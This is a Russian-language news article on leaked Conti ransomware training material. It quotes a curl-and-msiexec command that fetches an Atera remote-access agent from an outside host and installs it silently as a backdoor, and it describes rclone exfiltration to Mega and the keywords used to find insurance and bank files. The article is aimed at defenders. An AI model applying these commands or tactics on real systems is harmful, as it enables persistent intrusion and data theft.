Программа-вымогатель Conti уделяет приоритетное внимание краже данных о доходах и киберстраховании

27
НФЦ Фредди Меркьюри поступили в продажу для благотворительной организации

В этом месяце в сеть просочились обучающие материалы, используемые филиалами Conti по программам-вымогателям, что позволяет изнутри узнать, как злоумышленники злоупотребляют законным программным обеспечением и ищут полисы киберстрахования.

Ранее в этом месяце недовольный партнер опубликовал на хакерском форуме IP-адреса серверов Cobalt Strike C2, используемых бандой, и архив размером 113 МБ, содержащий обучающие материалы для проведения атак с использованием программ-вымогателей.

Используя этот просочившийся учебный материал, исследователи безопасности, сетевые администраторы и специалисты по реагированию на инциденты могут лучше реагировать на атаки и быстро находить общие индикаторы компрометации (IOC), используемые бандой программ-вымогателей.

Именно так обстоит дело с новым исследованием, опубликованным генеральным директором Advanced Intel Виталием Кремезом, которое показывает, как в реальных атаках Conti использовалась просочившаяся информация.

Законное программное обеспечение удаленного доступа, используемое как бэкдоры

Банда программ-вымогателей использует интересную тактику использования легитимного программного обеспечения удаленного доступа Atera в качестве лазейки для постоянной устойчивости.

При проведении атаки операции вымогателей обычно используют маяки Cobalt Strike, которые злоумышленники могут использовать для удаленного выполнения команд и получения постоянного доступа к сети.

Однако программные продукты безопасности стали более искусными в обнаружении ударных маяков Cobalt, что приводит к потере доступа для злоумышленников.

Чтобы предотвратить это, Кремез заявляет, что банда Conti устанавливает легитимное программное обеспечение удаленного доступа Atera на скомпрометированных системах, которые программа безопасности не обнаруживает.

Atera – это служба удаленного управления, в которой вы развертываете агентов на своих конечных точках, чтобы вы могли управлять ими всеми с единой консоли. Развернув агентов на всех скомпрометированных устройствах в сети, злоумышленники Conti получат удаленный доступ к любому устройству с единой платформы.

Кремез заявляет, что они видели следующую команду, используемую филиалами Conti для установки Atera на взломанное устройство:

shell curl -o setup.msi “http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com” && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1

«В большинстве случаев злоумышленники использовали учетные записи электронной почты protonmail [.] Com и outlook [.] Com для регистрации в Atera, чтобы получить сценарий установки агента и доступ к консоли», – пояснил Кремез в своем блоге о Conti, использующем Atera.

Кремез советует администраторам использовать инструменты белого списка для блокировки или аудита инструментов командной строки, таких как curl, для обнаружения вредоносной активности.

«Проверяйте и / или блокируйте интерпретаторы командной строки с помощью инструментов белого списка, таких как AppLocker или политик ограниченного использования программ, уделяя особое внимание любой подозрительной команде curl и неавторизованным сценариям установщика« .msi », особенно из C: \ ProgramData и C: \ Временный справочник », – советует Кремез.

Conti нацелена на страхование, банковские файлы

В одном из просочившихся документов под названием «CobaltStrike MANUAL_V2 .docx» подробно описаны конкретные шаги, которые аффилированное лицо должно использовать при проведении атаки программ-вымогателей Conti.

После первой стадии атаки, которая заключается в взломе сети, сборе учетных данных и получении контроля над доменом Windows, злоумышленники приказывают своим аффилированным лицам начать кражу данных из скомпрометированной сети.

Этот этап важен для злоумышленников, поскольку файлы используются не только для того, чтобы запугать жертв и заставить их заплатить выкуп, но и украденные документы бухгалтерского учета и страхового полиса также используются для определения первоначальной суммы выкупа и проведения переговоров.

При первом извлечении данных с серверов жертвы банда программ-вымогателей Conti будет специально искать документы, касающиеся финансовых показателей компании и наличия у них политики кибербезопасности.

«поиск по ключевым словам. нужны бухгалтерские отчеты. банковские выписки. за 20-21 год. все свежее. особенно важно, киберстрахование, документы политики безопасности», – говорится в переведенном учебном документе Conti.

В частности, на первых этапах кражи данных злоумышленники ищут следующие ключевые слова:

cyber policy insurance endorsement supplementary underwriting terms bank 2020 2021 Statement

Банда программ-вымогателей говорит аффилированным лицам «немедленно подготовить пакет данных» и немедленно загрузить данные в Mega, которую они использовали в качестве платформы для размещения эксфильтрованных данных.

Кремез сказал, что злоумышленники используют легитимную программу rclone для загрузки данных непосредственно в сервис облачного хранилища Mega.

«Создается конфигурация Rclone и устанавливается внешнее расположение (в данном случае MEGA) для синхронизации данных (клонирование данных). Необходимые общие сетевые ресурсы назначаются в rclone.conf в сети жертвы, и команда выполняется», – поясняет Кремез.

Кремез заявляет, что вам следует сосредоточиться на любой команде rclone.exe, запускаемой из каталогов C: \ ProgramData и C: \ Temp, для обнаружения попыток кражи данных.

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here